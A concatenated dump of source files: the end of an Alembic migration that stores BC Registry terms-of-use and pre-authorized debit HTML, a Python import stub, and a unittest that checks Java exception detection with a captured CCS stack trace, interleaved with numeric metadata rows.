<p><span>c.</span> <strong>“BCeID Information”</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a User, as the case may be, to the Service if the Subscriber or a User uses a BCeID for this purpose;</p>
<p><span>d.</span> <strong>“BC Online Terms and Conditions”</strong> means the BC Online Terms and Conditions of Agreement found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html">https://www.bconline.gov.bc.ca/terms_conditions.html;</a></p>
<p><span>e.</span> <strong>"Content"</strong> means the Service’s Data Base, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</p>
<p><span>f.</span> <strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</p>
<p><span>g.</span> <strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</p>
<p><span>h.</span> <strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which a User has Access through the Service;</p>
<p><span>i.</span> <strong>"Fees"</strong> means all fees and charges for the Service, as described in the Business Corporations Act - Schedule (Section 431) Fees, Cooperative Association Act - Cooperative Association Regulation, Schedule A;</p>
<p><span>j.</span> <strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a User to perform transactions with regard to that Entity;</p>
<p><span>k.</span> <strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a User to have Access with regard to those Entities;</p>
<p><span>l.</span> <strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions;</p>
<p><span>m.</span> <strong>"Service"</strong> means the service operated by the Province that allows a Subscriber to complete Transactions relating to BC Entities or other information accessible through the Website;</p>
<p><span>n.</span> <strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a User, as the case may be, to the Service if the Subscriber or a User uses a BC Services Card for this purpose;</p>
<p><span>o.</span> <strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</p>
<p><span>p.</span> <strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Users to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service;</p>
<p><span>q.</span> <strong>"User"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</p>
<p><span>r.</span> <strong>"Website"</strong> means the BC Cooperatives Website at bcregistry.ca/cooperatives and includes all web pages and associated materials, with the exception of the Content.</p>
</div>
</section>
<section>
<header><span>2.</span> ACCEPTANCE OF AGREEMENT</header>
<div>
<p><span>2.1</span> The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Users.</p>
<p><span>2.2</span> The Subscriber acknowledges and agrees that:</p>
<div>
<p><span>(a)</span> by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each User using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the User’s use of the Services; and</p>
<p><span>(b)</span> the Subscriber will be solely responsible for its Users’ use of the Services, including without limitation any Fees incurred by its Users in connection with such Services.</p>
</div>
<p><span>2.3</span> The Subscriber acknowledges that the terms of the BC Services Card Login Service found at (<a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/terms-of-use</a>) continue to apply in respect of use of the Services Card by either the Subscriber or a User.</p>
<p><span>2.4</span> Premium Account Subscribers acknowledge that in addition to this Agreement, the terms of the BC Online Terms and Conditions will continue to apply in respect of the use of the Subscriber’s Deposit Account for payment of Fees for the Service.</p>
<p><span>2.5</span> The Subscriber acknowledges that the BCeID terms found at (<a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a>) and applicable to the type of BCeID held by the Subscriber or a User, as the case may be, continue to apply in respect of use of the Subscriber or User’s BCeID.</p>
<p><span>2.6</span> The Subscriber will ensure that each of its Users are aware of and comply with the terms of this Agreement as they pertain to the User’s use of the Services.</p>
<p><span>2.7</span> The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Users, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Users review, the terms of this Agreement on a regular basis.</p>
<p><span>2.8</span> Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Users, as applicable. The Subscriber acknowledges and agrees that each of its Users must also accept any such changes as they pertain to the User’s use of the Services.</p>
</div>
</section>
<section>
<header><span>3.</span> PROPRIETARY RIGHTS</header>
<div>
<p><span>3.1</span> The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province. </p>
</div>
</section>
<section>
<header><span>4.</span> SERVICES</header>
<div>
<p><span>4.1</span> The Province will provide the Subscriber and its Users with Access on the terms and conditions set out in this Agreement.</p>
<p><span>4.2</span> Subject to section 4.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</p>
<p><span>4.3</span> The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</p>
<p><span>4.4</span> The Province further reserves the right to discontinue the Service at any time.</p>
<p><span>4.5</span> The Province will provide helpdesk support to assist Users with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</p>
<p><span>4.6</span> The Subscriber acknowledges and agrees that, for the purpose of Access:</p>
<div>
<p><span>(a)</span> it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</p>
<p><span>(b)</span> that any failure to do so may impact the Subscriber’s and/or User’s ability to access the Service.</p>
</div>
</div>
</section>
<section>
<header><span>5.</span> SUBSCRIBER OBLIGATIONS</header>
<div>
<p><span>5.1</span> The Subscriber will comply, and will ensure that all of its Users comply, with:</p>
<div>
<p><span>(a)</span> the requirements regarding the integrity and/or security of the Service set out in this Article 4; and</p>
<p><span>(b)</span> all applicable laws,</p>
</div>
<p>in connection with the Subscriber’s and/or Users’ use of the Services. </p>
<p><span>5.2</span> The Subscriber will ensure that each User:</p>
<div>
<p><span>(a)</span> is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</p>
<p><span>(b)</span> maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</p>
<p><span>(c)</span> is competent to perform a Transaction and utilize the Service; </p>
<p><span>(d)</span> has been adequately trained and instructed to perform a Transaction and utilize the Service; and</p>
<p><span>(e)</span> does not use the Service for any inappropriate or unlawful purpose.</p>
</div>
</div>
</section>
<section>
<header><span>6.</span> FEES</header>
<div>
<p><span>6.1</span> The Subscriber will pay to the Province all applicable Fees for the Services.</p>
<p><span>6.2</span> Fees payable for Transactions processed by Premium Account Subscribers will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions.</p>
<p><span>6.3</span> Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card before the Transaction is processed.</p>
</div>
</section>
<section>
<header><span>7.</span> RELATIONSHIP</header>
<div>
<p><span>7.1</span> This Agreement will not in any way make the Subscriber or any User an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Users do not, in any way indicate or hold out to any person that the Subscriber or any User is an employee, agent or independent contractor of the Province.</p>
</div>
</section>
<section>
<header><span>8.</span> SUSPENSION OF SERVICE </header>
<div>
<p><span>8.1</span> The Province may, in its sole discretion, immediately suspend Access upon written notice to the Subscriber if:</p>
<div>
<p><span>(a)</span> the Subscriber or any of its Users has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service; or</p>
<p><span>(b)</span> the Subscriber or any of its Users has violated any other provision of this Agreement.</p>
</div>
</div>
</section>
<section>
<header><span>9.</span> TERMINATION</header>
<div>
<p><span>9.1 </span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to section 8.1.</p>
<p><span>9.2 </span>Upon termination:</p>
<div>
<p><span>(a) </span>the Subscriber will immediately cease, and will ensure that all of its Users immediately cease, all use of the Service and all Passcodes; and</p>
<p><span>(b) </span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</p>
</div>
<p><span>9.3 </span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Entities and will release any Entities in excess of that number.</p>
</div>
</section>
<section>
<header>10. WARRANTY DISCLAIMER, LIMITATION OF LIABILITY AND INDEMNITY</header>
<div>
<p><span>10.1 </span>The subscriber acknowledges and confirms that the subscriber understands that this article 10 requires the subscriber to assume the full risk in respect of any use of the services by the subscriber and/or its users.</p>
<p><span>10.2 </span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</p>
<div>
<p><span>(a) </span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</p>
<p><span>(b) </span>the entire risk as to the quality and performance of the Service or any Content, is assumed by the Subscriber;</p>
<p><span>(c) </span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</p>
<p><span>(d) </span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any User or any person using a User's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any User from the Service.</p>
</div>
<p><span>10.3 </span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber or by any of the Subscriber’s agents, employees, officers or directors in connection with this Agreement.</p>
</div>
</section>
<section>
<header>11. GENERAL</header>
<div>
<p><span>11.1 </span>In this Agreement,</p>
<div>
<p><span>(a) </span>unless the context otherwise requires, references to sections by number are to sections of the Agreement;</p>
<p><span>(b) </span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</p>
<p><span>(c) </span>“person” includes an individual, partnership, corporation or legal entity of any nature; and</p>
<p><span>(d) </span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</p>
</div>
<p><span>11.2 </span>This Agreement is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</p>
<p><span>11.3 </span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement</p>
<p><span>11.4 </span>All provisions in this Agreement in favour or either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</p>
<p><span>11.5 </span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</p>
<p><span>11.6 </span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</p>
</div>
</section>
</article>
"""
    # Ad-hoc table construct so the update can be rendered without the model layer.
    documents = table('documents',
                      column('version_id', String),
                      column('type', String),
                      column('content_type', String),
                      column('content', String))
    # NOTE: chained .where() calls are ANDed by SQLAlchemy.  The previous code
    # used the Python `and` operator between clause expressions, which evaluates
    # the first clause's truthiness and silently drops the `type` filter.
    op.execute(
        documents.update()
        .where(documents.c.version_id == op.inline_literal('3'))
        .where(documents.c.type == op.inline_literal('termsofuse'))
        .values({'content': op.inline_literal(tos_version3_content)})
    )
    # change pad-terms content back
    pad_terms_content = """
<section>
<header>
In this agreement:
</header>
<p>
“the biller” refers to “Her Majesty the Queen in Right of the Province of British Columbia as represented by the Minister of Citizen’s Services - BC Registry and Online Services (Prov of BC);
</p>
<p>
“the payor” refers to the Premium Account Subscriber of the BC Registry Service as defined in the BC Registry Terms and Conditions of Agreement (the “BC Registry Terms”); and</p>
<p>
unless defined herein, capitalized terms in this agreement will have the meaning as set out in BC Registry Terms.
</p>
</section>
<section>
<header>
The payor acknowledges or understands:
</header>
<ol>
<li>
That this authorization is provided for the benefit of the biller and our financial institution, and is provided in consideration of the Payor’s Financial Institution agreeing to process debits (PADs) against the bank account as indicated in the biller’s PAD application webform and in accordance with the rules of <a href="http://www.payments.ca" target="_blank">Payments Canada</a>.
</li>
<li>
Ticking the acceptance box on the biller’s PAD application webform will be considered equivalent to my signature and will constitute valid authorization for the processing financial institution to debit the payor’s account as identified in the biller’s PAD application webform (the “Payor’s Bank Account”).
</li>
<li>
This authority will remain in effect until the biller has received written communication from the payor of cancellation or changes relating to the Payor’s Bank Account.
</li>
<li>
The payor may cancel this PAD agreement at any time with written notification to the biller. Written notification of changes or cancellation must be received at least 10 business days prior to the next online order or withdrawal. Notification must be in writing and sent either through the biller’s BC Registry website or by mail to the address provided below. A sample cancellation form or more information on my right to cancel a PAD Agreement can be obtained at my financial institution or by visiting <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
That cancellation of this agreement by the payor or the biller:
<ol type="a">
<li>
will result in the suspension of the payors’ Premium Account Subscriber account Access until the payor takes action to authorize another payment method; and
</li>
<li>
does not cancel any amount owed for the Service received prior to cancellation.
</li>
</ol>
</li>
<li>
Correspondence regarding this agreement will be sent to the payor at the email address associated with the payor’s Premium Subscriber Account (the “Payor’s Email Address”). The payor agrees that any communication sent by the biller to that email address will be deemed to have been received by the payor and acknowledges that it is the payor’s responsibility to notify the biller as soon as possible of changes to the Payor’s Email Address.
</li>
<li>
<strong>The biller notification of enrollment or cancellation of this Pre-Authorized Debit Agreement to the Payor is being reduced from 15 calendar days to 3 calendar days in accordance with the H1 rule of Payments Canada. Notification will be delivered electronically to the Payor’s Email Address.</strong>
</li>
<li>
The payor has certain recourse rights if any debit does not comply with the terms of this business PAD agreement (for example, the right to receive reimbursement for any PAD that is not authorized or is not consistent with terms and conditions of this PAD Agreement). To obtain a form for reimbursement or for more information on recourse rights, contact your financial institution or visit <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
Any payment dishonoured by the payor’s financial institution may result in a dishonoured banking instrument service fee, as prescribed by the Minister of Finance, being applied to the payor’s Premium Account Subscriber account. The biller is not responsible for any additional service fees charged by your financial institution.
</li>
<li>
In the event of a dishonoured payment, the biller reserves the right to suspend the payor’s Access until the payor has taken action to re-activate Access by paying any outstanding Fees and dishonoured banking instrument service fees by credit card.
</li>
<li>
Due to a delay in payment processing, the biller may subsequently suspend the payor’s Access after a payor has taken action to re-activate Access if another PAD is dishonoured in the intervening period.
</li>
<li>
The amount of the daily (excludes weekends and holidays) withdrawal is variable and dependent on the total daily Transactions charged to the payors’ Premium Account Subscriber’s account by Team Members who are authorized to order BC Registry Services.
</li>
<li>
<strong>The standard 10 calendar day pre-notification period for the sporadic and variable pre-authorized withdrawals will be reduced to 1-2 business days.</strong>
</li>
<li>
The biller will provide PAD pre-notification 1-2 business days prior to the withdrawal date. This notification will confirm the amount and estimated date of the pre-authorized withdrawal, will provide a list of all services ordered & other account adjustments and will be delivered electronically to the Payor’s Email Address.
</li>
<li>
Your financial institution is not responsible for verifying whether payment has been issued in accordance with the particulars of this agreement.
</li>
</ol>
</section>
<section>
<header>
<strong>Payor Authorization:</strong>
</header>
<p>
I have read, understood and agree to the terms and conditions of the Business Pre-Authorized Debit Terms and Conditions for BC Registry Services
</p>
<p>
I confirm, I am an authorized representative for the payor and authorized signatory on the account to be debited under this agreement.
</p>
<p>
I authorize the biller to withdraw funds from the bank account as indicated above as per the terms and conditions of this agreement.
</p>
<p>
Dated: Month Day, Year
</p>
</section>
"""
    # Same fix as above: both filters must be applied, so chain the .where()
    # calls instead of combining clause objects with Python `and`.
    op.execute(
        documents.update()
        .where(documents.c.version_id == op.inline_literal('p1'))
        .where(documents.c.type == op.inline_literal('termsofuse_pad'))
        .values({'content': op.inline_literal(pad_terms_content)})
    )
    # ### end Alembic commands ###
| 99.576608
| 794
| 0.705948
| 12,919
| 85,138
| 4.647496
| 0.068736
| 0.044603
| 0.020253
| 0.006063
| 0.890225
| 0.874236
| 0.851901
| 0.832081
| 0.823954
| 0.81506
| 0
| 0.007748
| 0.214734
| 85,138
| 854
| 795
| 99.693208
| 0.890302
| 0.004722
| 0
| 0.58
| 0
| 0.36625
| 0.978429
| 0.07691
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0025
| false
| 0.0225
| 0.005
| 0
| 0.0075
| 0.01375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cf1a0adbe8d491d80a0bacd2c2a286cb30eb4f69
| 136
|
py
|
Python
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 6
|
2018-01-25T13:49:24.000Z
|
2020-03-07T16:25:09.000Z
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 369
|
2018-01-17T15:22:18.000Z
|
2022-03-10T19:14:56.000Z
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 3
|
2018-04-11T14:18:37.000Z
|
2018-10-31T19:09:48.000Z
|
from dataservice.api.genomic_file.resources import GenomicFileAPI
from dataservice.api.genomic_file.resources import GenomicFileListAPI
| 45.333333
| 69
| 0.897059
| 16
| 136
| 7.5
| 0.5625
| 0.25
| 0.3
| 0.416667
| 0.733333
| 0.733333
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 136
| 2
| 70
| 68
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
d86dc9751469d674801b9b451d32358fa2aa0b96
| 8,296
|
py
|
Python
|
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2018-08-02T02:29:36.000Z
|
2018-09-26T19:46:24.000Z
|
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
import unittest
import re
from PythonBinding import CcsPythonExecutorThread
# This is the socket text from run 11063 for which the exception handling
# failed (see LSSTTD-1418): a captured Java/Jython stack trace followed by a
# second CommandInvocationException block, used by the test below to verify
# that java exceptions embedded in socket output are detected.
socket_text = b"""
org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:101)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:77)
at org.lsst.ccs.command.CompositeCommandSet.invoke(CompositeCommandSet.java:92)
at org.lsst.ccs.Agent$RunningCommand.lambda$new$1(Agent.java:1052)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at java.io.FileInputStream.open0(Native Method)
at java.io.FileInputStream.open(FileInputStream.java:195)
at java.io.FileInputStream.<init>(FileInputStream.java:138)
at java.io.FileReader.<init>(FileReader.java:72)
at org.lsst.ccs.subsystem.ts8.FitsUtilities.readPhotoDiodeFile(FitsUtilities.java:54)
at org.lsst.ccs.subsystem.ts8.FitsUtilities.updatePhotoDiodeValues(FitsUtilities.java:205)
at org.lsst.ccs.subsystem.ts8.TS8Subsystem.addBinaryTable(TS8Subsystem.java:1133)
at sun.reflect.GeneratedMethodAccessor75.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:84)
... 9 more
org.lsst.ccs.command.CommandInvocationException: org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.python.core.Py.JavaError(Py.java:552)
at org.python.core.Py.JavaError(Py.java:543)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyObject.__call__(PyObject.java:438)
at org.python.core.PyMethod.instancemethod___call__(PyMethod.java:237)
at org.python.core.PyMethod.__call__(PyMethod.java:228)
at org.python.core.PyMethod.__call__(PyMethod.java:223)
at org.python.core.PyObject._callextra(PyObject.java:620)
at ccs_scripting_tools$py.sendSynchCommand$4(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py:35)
at ccs_scripting_tools$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:308)
at org.python.core.PyBaseCode.call(PyBaseCode.java:199)
at org.python.core.PyFunction.__call__(PyFunction.java:482)
at org.python.core.PyMethod.instancemethod___call__(PyMethod.java:237)
at org.python.core.PyMethod.__call__(PyMethod.java:228)
at org.python.core.PyMethod.__call__(PyMethod.java:223)
at org.python.core.PyObject._callextra(PyObject.java:620)
at ccs_scripting_tools$py.synchCommand$5(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py:38)
at ccs_scripting_tools$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:308)
at org.python.core.PyBaseCode.call(PyBaseCode.java:162)
at org.python.core.PyFunction.__call__(PyFunction.java:434)
at org.python.core.PyMethod.__call__(PyMethod.java:156)
at eo_acquisition$py.add_pd_time_history$31(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py:569)
at eo_acquisition$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:171)
at org.python.core.PyFunction.__call__(PyFunction.java:434)
at org.python.core.PyMethod.__call__(PyMethod.java:156)
at eo_acquisition$py.get_readings$32(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py:589)
at eo_acquisition$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:189)
at org.python.core.PyFunction.__call__(PyFunction.java:446)
at org.python.core.PyMethod.__call__(PyMethod.java:171)
at org.python.pycode._pyx11657.run$3(<script>:32)
at org.python.pycode._pyx11657.call_function(<script>)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:139)
at org.python.core.PyFunction.__call__(PyFunction.java:413)
at org.python.core.PyMethod.__call__(PyMethod.java:126)
at org.python.pycode._pyx11657.f$0(<script>:62)
at org.python.pycode._pyx11657.call_function(<script>)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1614)
at org.python.core.Py.exec(Py.java:1658)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:276)
at org.lsst.ccs.subsystems.console.jython.JythonInterpreterConsole$JythonProcessingThread.run(JythonInterpreterConsole.java:371)
Caused by: org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:101)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:77)
at org.lsst.ccs.command.CompositeCommandSet.invoke(CompositeCommandSet.java:92)
at org.lsst.ccs.Agent$RunningCommand.lambda$new$1(Agent.java:1052)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
"""
class FakeSocketConnection:
    """Minimal socket stand-in that replays one fixed byte payload."""

    def __init__(self, socket_text):
        # Canned bytes handed back by every recv() call.
        self.socket_text = socket_text

    def recv(self, arg):
        """Return the canned payload; the requested size is ignored."""
        return self.socket_text
class CcsPythonExecutorThreadTestCase(unittest.TestCase):
    """Unit tests for CcsPythonExecutorThread."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_java_exception_handling(self):
        """Java exception text in the socket stream is captured by the executor."""
        thread_id = b'0'
        # Terminate the canned stream the way the real service does.
        payload = socket_text + b"\ndoneExecution:" + thread_id
        executor = CcsPythonExecutorThread(thread_id.decode('utf-8'),
                                           FakeSocketConnection(payload))
        executor.running = True
        executor.listenToSocketOutput()
        self.assertNotEqual(len(executor.java_exceptions), 0)
if __name__ == '__main__':
    # Run the test suite when this module is executed as a script.
    unittest.main()
| 65.322835
| 311
| 0.803399
| 1,243
| 8,296
| 5.226066
| 0.193886
| 0.042334
| 0.071121
| 0.085437
| 0.739994
| 0.716441
| 0.712284
| 0.700893
| 0.659945
| 0.659945
| 0
| 0.065529
| 0.067382
| 8,296
| 126
| 312
| 65.84127
| 0.774073
| 0.025072
| 0
| 0.424779
| 0
| 0.20354
| 0.888559
| 0.812283
| 0
| 0
| 0
| 0
| 0.00885
| 1
| 0.044248
| false
| 0.017699
| 0.026549
| 0.00885
| 0.097345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
